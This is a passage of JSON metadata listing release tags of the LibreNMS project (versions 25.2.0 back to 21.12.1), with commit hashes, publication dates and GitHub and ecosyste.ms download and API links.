.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@25.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.2.0/manifests"},{"name":"25.1.0","sha":"ae81cfce059aa7d984febcf52aa5165ab8807992","kind":"commit","published_at":"2025-01-17T05:28:40.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/25.1.0","html_url":"https://github.com/librenms/librenms/releases/tag/25.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@25.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/25.1.0/manifests"},{"name":"24.12.0","sha":"18a4b056ea3c160ee08ec7e3c46f1d2825a0e469","kind":"commit","published_at":"2024-12-17T23:55:13.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/24.12.0","html_url":"https://github.com/librenms/librenms/releases/tag/24.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@24.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.12.0/manifests"},{"name":"24.11.0","sha":"c36bbdbda7e082dc04881b83e6ab978983bc9b4a","kind":"commit","published_at":"2024-11-20T14:58:54.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/24.11.0","html_url":"https://github.com/librenms/librenms/releases/tag/24.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@24.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.11.0/manifests"},{"name":"24.10.1","sha":"8fdf0b4597abc06549c6493603bdc0b83c8894c3","kind":"commit","published_at":"2024-11-06T15:04:00.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/24.10.1","html_url":"https://github.com/librenms/librenms/releases/tag/24.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@24.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.10.1/manifests"},{"name":"24.10.0","sha":"a625d1ef0b66e093414d8d440f8b5f4f85baadfa","kind":"commit","published_at":"2024-11-05T15:33:35.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/24.10.0","html_url":"https://github.com/librenms/librenms/releases/tag/24.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@24.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.10.0/manifests"},{"name":"24.9.1","sha":"615a5ab92c602cb5efe54f281dd058fe83f2bee6","kind":"commit","published_at":"2024-09-29T23:40:22.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/24.9.1","html_url":"https://github.com/librenms/librenms/releases/tag/24.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@24.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.9.1/manifests"},{"name":"24.9.0","sha":"cf897d278e93d233850d574624814a3dbe0ff935","kind":"commit","published_at":"2024-09-29T21:47:37.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/24.9.0","html_url":"https://github.com/librenms/librenms/releases/tag/24.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@24.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.9.0/manifests"},{"name":"24.8.1","sha":"a7aaaac103f33b531c51cf8c9912660a51b3ab45","kind":"commit","published_at":"2024-08-22T02:50:00.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/24.8.1","html_url":"https://github.com/librenms/librenms/releases/tag/24.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@24.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.8.1/manifests"},{"name":"24.8.0","sha":"f6fe0cf2da7c386b7d44cc523420b07e26b5561d","kind":"commit","published_at":"2024-08-15T20:14:10.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/24.8.0","html_url":"https://github.com/librenms/librenms/releases/tag/24.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@24.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.8.0/manifests"},{"name":"24.7.0","sha":"f3227c3727d5552f12b95c9af60e78b49a66df02","kind":"commit","published_at":"2024-07-17T06:35:08.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/24.7.0","html_url":"https://github.com/librenms/librenms/releases/tag/24.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@24.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.7.0/manifests"},{"name":"24.6.0","sha":"a717e084f0acc99bba8ce5c3fa2d7ae6e6eb5fbe","kind":"commit","published_at":"2024-06-16T16:23:37.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/24.6.0","html_url":"https://github.com/librenms/librenms/releases/tag/24.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@24.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.6.0/manifests"},{"name":"24.5.0","sha":"2a42bf714fc095fbe1bf7d3d1a093b66e8a87b42","kind":"commit","published_at":"2024-05-20T03:53:54.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/24.5.0","html_url":"https://github.com/librenms/librenms/releases/tag/24.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@24.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.5.0/manifests"},{"name":"24.4.1","sha":"613fd18511aa2fb0a05d60584d6d985e76c0ba3a","kind":"commit","published_at":"2024-04-20T14:26:51.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/24.4.1","html_url":"https://github.com/librenms/librenms/releases/tag/24.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@24.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.4.1/manifests"},{"name":"24.4.0","sha":"9088a34299ee4e41d0767e63e771a2c19d9ed067","kind":"commit","published_at":"2024-04-20T01:52:35.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/24.4.0","html_url":"https://github.com/librenms/librenms/releases/tag/24.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@24.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.4.0/manifests"},{"name":"24.3.0","sha":"af2f953c7facc58038791228045e3e9801f01d93","kind":"commit","published_at":"2024-04-01T15:18:44.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/24.3.0","html_url":"https://github.com/librenms/librenms/releases/tag/24.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@24.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.3.0/manifests"},{"name":"24.2.0","sha":"f3627462242a7ee711742fcbff5f61786e93bf62","kind":"commit","published_at":"2024-02-27T18:54:10.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/24.2.0","html_url":"https://github.com/librenms/librenms/releases/tag/24.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@24.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.2.0/manifests"},{"name":"24.1.0","sha":"421f2c7d384225f3f0a1f7a15ceb32755d22df23","kind":"commit","published_at":"2024-01-07T15:49:52.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/24.1.0","html_url":"https://github.com/librenms/librenms/releases/tag/24.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@24.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/24.1.0/manifests"},{"name":"23.11.0","sha":"54ff1d7e63c9b5d076288aace65c9c9792d2a800","kind":"commit","published_at":"2023-11-17T02:57:41.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/23.11.0","html_url":"https://github.com/librenms/librenms/releases/tag/23.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@23.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.11.0/manifests"},{"name":"23.10.0","sha":"c22b74d46b307979a5b6a28b1a3a54e68b3152c4","kind":"commit","published_at":"2023-10-27T03:47:36.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/23.10.0","html_url":"https://github.com/librenms/librenms/releases/tag/23.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@23.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.10.0/manifests"},{"name":"23.9.1","sha":"bfc82a53831a5b4e727f41e04e1e844e63bbc301","kind":"commit","published_at":"2023-09-19T01:59:06.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/23.9.1","html_url":"https://github.com/librenms/librenms/releases/tag/23.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@23.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.9.1/manifests"},{"name":"23.9.0","sha":"ba67d886c84ffdff2a800665cac00de77c0abfae","kind":"commit","published_at":"2023-09-15T13:05:55.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/23.9.0","html_url":"https://github.com/librenms/librenms/releases/tag/23.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@23.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.9.0/manifests"},{"name":"23.8.2","sha":"3b7185d825c2aae8da2ccc79723e211d353282e7","kind":"commit","published_at":"2023-08-21T15:48:13.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/23.8.2","html_url":"https://github.com/librenms/librenms/releases/tag/23.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@23.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.8.2/manifests"},{"name":"23.8.1","sha":"b04e31710d9cd1377d6f44547d135c9de593ac21","kind":"commit","published_at":"2023-08-21T05:31:19.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/23.8.1","html_url":"https://github.com/librenms/librenms/releases/tag/23.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@23.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.8.1/manifests"},{"name":"23.8.0","sha":"69297c9e91bf17bcdbb6ece226bfbbf46162f83a","kind":"commit","published_at":"2023-08-19T14:13:28.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/23.8.0","html_url":"https://github.com/librenms/librenms/releases/tag/23.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@23.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.8.0/manifests"},{"name":"23.7.0","sha":"6edb3b5046ca8096584374e2eb71d332e2e3361c","kind":"commit","published_at":"2023-07-17T04:42:41.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/23.7.0","html_url":"https://github.com/librenms/librenms/releases/tag/23.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@23.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.7.0/manifests"},{"name":"23.6.0","sha":"eaf025341211100680157ac427dce728ac46e339","kind":"commit","published_at":"2023-06-23T13:25:03.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/23.6.0","html_url":"https://github.com/librenms/librenms/releases/tag/23.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@23.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.6.0/manifests"},{"name":"23.5.0","sha":"02896172bdc26711d03f23bb502d3640f58b651d","kind":"commit","published_at":"2023-05-19T15:32:19.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/23.5.0","html_url":"https://github.com/librenms/librenms/releases/tag/23.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@23.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.5.0/manifests"},{"name":"23.4.1","sha":"e9c08e21a527c77e72f729bcec08712262a13e6a","kind":"commit","published_at":"2023-04-11T18:44:45.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/23.4.1","html_url":"https://github.com/librenms/librenms/releases/tag/23.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@23.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.4.1/manifests"},{"name":"23.4.0","sha":"d6e1c6ee5f4f4cfafa21ceedb6f2c1861211ecac","kind":"commit","published_at":"2023-04-06T23:52:52.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/23.4.0","html_url":"https://github.com/librenms/librenms/releases/tag/23.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@23.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.4.0/manifests"},{"name":"23.2.0","sha":"c91b9b64d79e145b2d9830d16aa000a527502617","kind":"commit","published_at":"2023-02-23T22:27:42.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/23.2.0","html_url":"https://github.com/librenms/librenms/releases/tag/23.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@23.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.2.0/manifests"},{"name":"23.1.1","sha":"13b028e59cb53332e79c297b9f0140315e5ed561","kind":"commit","published_at":"2023-01-27T16:52:21.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/23.1.1","html_url":"https://github.com/librenms/librenms/releases/tag/23.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@23.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.1.1/manifests"},{"name":"23.1.0","sha":"040ebcf9171ba646f58fc875c68bc7f48f60c185","kind":"commit","published_at":"2023-01-24T16:43:30.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/23.1.0","html_url":"https://github.com/librenms/librenms/releases/tag/23.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@23.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/23.1.0/manifests"},{"name":"22.12.0","sha":"8b4263f2f386677b5c1f187bd7238fc1aba61d14","kind":"commit","published_at":"2022-12-28T18:26:21.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/22.12.0","html_url":"https://github.com/librenms/librenms/releases/tag/22.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@22.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.12.0/manifests"},{"name":"22.11.0","sha":"bea0389938ef31cdfe7ea383e5a4e8a7ef16df4e","kind":"commit","published_at":"2022-11-24T06:01:26.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/22.11.0","html_url":"https://github.com/librenms/librenms/releases/tag/22.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@22.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.11.0/manifests"},{"name":"22.10.0","sha":"ddf24809d48485dfdaf70cab1d98eec582674e76","kind":"commit","published_at":"2022-10-18T04:47:05.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/22.10.0","html_url":"https://github.com/librenms/librenms/releases/tag/22.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@22.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.10.0/manifests"},{"name":"22.9.0","sha":"dbcee24749ae6e02eff58da0c1b1dae771c15f24","kind":"commit","published_at":"2022-09-21T06:51:22.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/22.9.0","html_url":"https://github.com/librenms/librenms/releases/tag/22.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@22.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.9.0/manifests"},{"name":"22.8.0","sha":"ff7d89e5e4b702c6044b22c10c1259d03fefd83d","kind":"commit","published_at":"2022-08-20T01:34:31.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/22.8.0","html_url":"https://github.com/librenms/librenms/releases/tag/22.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@22.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.8.0/manifests"},{"name":"22.7.0","sha":"747d6f288c5c6313e5b6433ab273cca5e75ce8ba","kind":"commit","published_at":"2022-07-21T02:53:17.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/22.7.0","html_url":"https://github.com/librenms/librenms/releases/tag/22.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@22.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.7.0/manifests"},{"name":"22.6.0","sha":"3724aaa836722088a600758c829fb612519c22eb","kind":"commit","published_at":"2022-06-15T02:53:42.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/22.6.0","html_url":"https://github.com/librenms/librenms/releases/tag/22.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@22.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.6.0/manifests"},{"name":"22.5.0","sha":"5a4fd0bb136fc836240901caf769c7e6ed613cba","kind":"commit","published_at":"2022-05-21T13:45:24.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/22.5.0","html_url":"https://github.com/librenms/librenms/releases/tag/22.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@22.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.5.0/manifests"},{"name":"22.4.1","sha":"a71ea964b6498cda4e140551858d377301e6a670","kind":"commit","published_at":"2022-04-22T15:09:45.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/22.4.1","html_url":"https://github.com/librenms/librenms/releases/tag/22.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@22.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.4.1/manifests"},{"name":"22.4.0","sha":"15feac72971b83e6c1c485c8893dc6a37e8b995b","kind":"commit","published_at":"2022-04-22T02:13:47.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/22.4.0","html_url":"https://github.com/librenms/librenms/releases/tag/22.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@22.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.4.0/manifests"},{"name":"22.3.0","sha":"22209732ddef439cec4bb896ed1f4cf9aaf3cafb","kind":"commit","published_at":"2022-03-18T04:00:10.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/22.3.0","html_url":"https://github.com/librenms/librenms/releases/tag/22.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@22.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.3.0/manifests"},{"name":"22.2.2","sha":"04c9630d1e1d9aae4b33847317c744b4ba204fae","kind":"commit","published_at":"2022-03-02T20:49:12.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/22.2.2","html_url":"https://github.com/librenms/librenms/releases/tag/22.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@22.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.2.2/manifests"},{"name":"22.2.1","sha":"0c08670acc0b98e678b7733f4e7ce6f217b9a610","kind":"commit","published_at":"2022-02-18T09:12:46.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/22.2.1","html_url":"https://github.com/librenms/librenms/releases/tag/22.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@22.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.2.1/manifests"},{"name":"22.2.0","sha":"39dde372d9076ef84fc4e72b93407788634799a9","kind":"commit","published_at":"2022-02-16T10:10:32.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/22.2.0","html_url":"https://github.com/librenms/librenms/releases/tag/22.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@22.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.2.0/manifests"},{"name":"22.1.0","sha":"e1908f26d69a3e86db53fd83833e0634609ffca6","kind":"commit","published_at":"2022-01-23T14:47:41.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/22.1.0","html_url":"https://github.com/librenms/librenms/releases/tag/22.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@22.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/22.1.0/manifests"},{"name":"21.12.1","sha":"785b0bae537cd7fa6bcabee67b27bd8d4f35704f","kind":"commit","published_at":"2022-01-04T13:30:27.000Z","download_url":"https://codeload.github.com/librenms/librenms/tar.gz/21.12.1","html_url":"https://github.com/librenms/librenms/releases/tag/21.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/librenms/librenms@21.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/librenms%2Flibrenms/tags/21.12.